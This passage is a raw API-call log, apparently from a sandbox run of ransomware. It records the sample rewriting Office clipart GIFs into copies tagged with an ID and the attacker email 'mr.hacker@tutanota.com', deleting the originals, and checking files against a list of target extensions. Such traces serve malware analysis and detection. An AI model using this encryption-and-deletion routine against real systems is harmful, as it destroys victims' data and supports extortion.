files\\microsoft office\\clipart\\pub60cor\\ag00169_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0053.416] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.416] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.416] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00169_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0053.416] GetLastError () returned 0x0 [0053.416] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x14ff, lpOverlapped=0x0) returned 1 [0053.421] WriteFile (in: hFile=0x1a0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1500, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x1500, lpOverlapped=0x0) returned 1 [0053.422] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0053.422] WriteFile (in: hFile=0x1a0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.422] SetEndOfFile (hFile=0x1a0) returned 1 [0053.422] CloseHandle (hObject=0x1a0) returned 1 [0053.422] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.422] SetEndOfFile (hFile=0x1b4) returned 1 [0053.423] CloseHandle (hObject=0x1b4) returned 1 [0053.423] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.423] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00169_.gif")) returned 1 [0053.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 63 [0053.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 63 [0053.423] lstrlenW (lpString=".doc") returned 4 [0053.423] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.424] lstrlenW (lpString=".docx") returned 5 [0053.424] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.424] lstrlenW (lpString=".pdf") returned 4 [0053.424] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.424] lstrlenW (lpString=".xls") returned 4 [0053.424] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.424] lstrlenW (lpString=".xlsx") returned 5 [0053.424] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.424] lstrlenW (lpString=".ppt") returned 4 [0053.424] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.424] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 63 [0053.424] lstrlenW (lpString=".zip") returned 4 [0053.424] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.424] lstrlenW (lpString=".rar") returned 4 [0053.424] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.424] lstrlenW (lpString=".bz2") returned 4 [0053.424] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.424] lstrlenW (lpString=".7z") returned 3 [0053.424] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.424] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 63 [0053.424] lstrlenW (lpString=".dbf") returned 4 [0053.424] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.424] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 63 [0053.424] lstrlenW (lpString=".1cd") returned 4 [0053.424] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.424] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 63 [0053.424] lstrlenW (lpString=".jpg") returned 4 [0053.424] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.425] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=5016) returned 1 [0053.425] CloseHandle (hObject=0x1b4) returned 1 [0053.425] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00171_.gif")) returned 0x20 [0053.425] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00171_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0053.425] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00171_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0053.425] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.425] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.425] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00171_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0053.425] GetLastError () returned 0x0 [0053.425] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x1398, lpOverlapped=0x0) returned 1 [0053.431] WriteFile (in: hFile=0x1a0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x13a0, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x13a0, lpOverlapped=0x0) returned 1 [0053.432] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0053.432] WriteFile (in: hFile=0x1a0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.432] SetEndOfFile (hFile=0x1a0) returned 1 [0053.432] CloseHandle (hObject=0x1a0) returned 1 [0053.433] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.433] SetEndOfFile (hFile=0x1b4) returned 1 [0053.433] CloseHandle (hObject=0x1b4) returned 1 [0053.434] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.434] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00171_.gif")) returned 1 [0053.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 63 [0053.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 63 [0053.434] lstrlenW (lpString=".doc") returned 4 [0053.434] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.434] lstrlenW (lpString=".docx") returned 5 [0053.434] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.434] lstrlenW (lpString=".pdf") returned 4 [0053.434] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.434] lstrlenW (lpString=".xls") returned 4 [0053.434] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.434] lstrlenW (lpString=".xlsx") returned 5 [0053.434] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.434] lstrlenW (lpString=".ppt") returned 4 [0053.434] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 63 [0053.435] lstrlenW (lpString=".zip") returned 4 [0053.435] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.435] lstrlenW (lpString=".rar") returned 4 [0053.435] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.435] lstrlenW (lpString=".bz2") returned 4 [0053.435] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.435] lstrlenW (lpString=".7z") returned 3 [0053.435] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 63 [0053.435] lstrlenW (lpString=".dbf") returned 4 [0053.435] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 63 [0053.435] lstrlenW (lpString=".1cd") returned 4 [0053.435] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 63 [0053.435] lstrlenW (lpString=".jpg") returned 4 [0053.435] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.435] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=3966) returned 1 [0053.435] CloseHandle (hObject=0x1b4) returned 1 [0053.435] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00174_.gif")) returned 0x20 [0053.435] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00174_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0053.435] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00174_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0053.436] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.436] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.436] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00174_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0053.436] GetLastError () returned 0x0 [0053.436] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0xf7e, lpOverlapped=0x0) returned 1 [0053.437] WriteFile (in: hFile=0x1a0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf80, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xf80, lpOverlapped=0x0) returned 1 [0053.438] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0053.438] WriteFile (in: hFile=0x1a0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.438] SetEndOfFile (hFile=0x1a0) returned 1 [0053.439] CloseHandle (hObject=0x1a0) returned 1 [0053.439] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.439] SetEndOfFile (hFile=0x1b4) returned 1 [0053.439] CloseHandle (hObject=0x1b4) returned 1 [0053.440] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.440] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00174_.gif")) returned 1 [0053.440] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 63 [0053.440] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 63 [0053.440] lstrlenW (lpString=".doc") returned 4 [0053.440] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.440] lstrlenW (lpString=".docx") returned 5 [0053.440] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.440] lstrlenW (lpString=".pdf") returned 4 [0053.440] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.440] lstrlenW (lpString=".xls") returned 4 [0053.440] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.440] lstrlenW (lpString=".xlsx") returned 5 [0053.440] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.440] lstrlenW (lpString=".ppt") returned 4 [0053.440] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.440] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 63 [0053.440] lstrlenW (lpString=".zip") returned 4 [0053.440] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.440] lstrlenW (lpString=".rar") returned 4 [0053.440] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.440] lstrlenW (lpString=".bz2") returned 4 [0053.441] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.441] lstrlenW (lpString=".7z") returned 3 [0053.441] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.441] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 63 [0053.441] lstrlenW (lpString=".dbf") returned 4 [0053.441] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.441] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 63 [0053.441] lstrlenW (lpString=".1cd") returned 4 [0053.441] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.441] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 63 [0053.441] lstrlenW (lpString=".jpg") returned 4 [0053.441] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.441] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=3378) returned 1 [0053.441] CloseHandle (hObject=0x1b4) returned 1 [0053.441] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00175_.gif")) returned 0x20 [0053.441] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00175_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0053.441] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00175_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0053.441] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.442] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.442] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00175_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0053.442] GetLastError () returned 0x0 [0053.442] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0xd32, lpOverlapped=0x0) returned 1 [0053.443] WriteFile (in: hFile=0x1a0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xd40, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xd40, lpOverlapped=0x0) returned 1 [0053.444] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0053.444] WriteFile (in: hFile=0x1a0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.444] SetEndOfFile (hFile=0x1a0) returned 1 [0053.444] CloseHandle (hObject=0x1a0) returned 1 [0053.445] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.445] SetEndOfFile (hFile=0x1b4) returned 1 [0053.446] CloseHandle (hObject=0x1b4) returned 1 [0053.446] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.446] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00175_.gif")) returned 1 [0053.446] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 63 [0053.446] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 63 [0053.446] lstrlenW (lpString=".doc") returned 4 [0053.446] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.446] lstrlenW (lpString=".docx") returned 5 [0053.446] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.446] lstrlenW (lpString=".pdf") returned 4 [0053.446] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.446] lstrlenW (lpString=".xls") returned 4 [0053.446] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.446] lstrlenW (lpString=".xlsx") returned 5 [0053.446] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.446] lstrlenW (lpString=".ppt") returned 4 [0053.446] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.446] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 63 [0053.447] lstrlenW (lpString=".zip") returned 4 [0053.447] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.447] lstrlenW (lpString=".rar") returned 4 [0053.447] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.447] lstrlenW (lpString=".bz2") returned 4 [0053.447] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.447] lstrlenW (lpString=".7z") returned 3 [0053.447] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.447] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 63 [0053.447] lstrlenW (lpString=".dbf") returned 4 [0053.447] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.447] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 63 [0053.447] lstrlenW (lpString=".1cd") returned 4 [0053.447] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.447] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 63 [0053.447] lstrlenW (lpString=".jpg") returned 4 [0053.447] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.447] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=3120) returned 1 [0053.447] CloseHandle (hObject=0x1b4) returned 1 [0053.447] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00176_.gif")) returned 0x20 [0053.447] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00176_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0053.447] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00176_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0053.448] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.448] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.448] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00176_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0053.448] GetLastError () returned 0x0 [0053.448] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0xc30, lpOverlapped=0x0) returned 1 [0053.450] WriteFile (in: hFile=0x1a0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xc40, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xc40, lpOverlapped=0x0) returned 1 [0053.450] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0053.450] WriteFile (in: hFile=0x1a0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.451] SetEndOfFile (hFile=0x1a0) returned 1 [0053.451] CloseHandle (hObject=0x1a0) returned 1 [0053.451] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.451] SetEndOfFile (hFile=0x1b4) returned 1 [0053.452] CloseHandle (hObject=0x1b4) returned 1 [0053.452] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.452] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00176_.gif")) returned 1 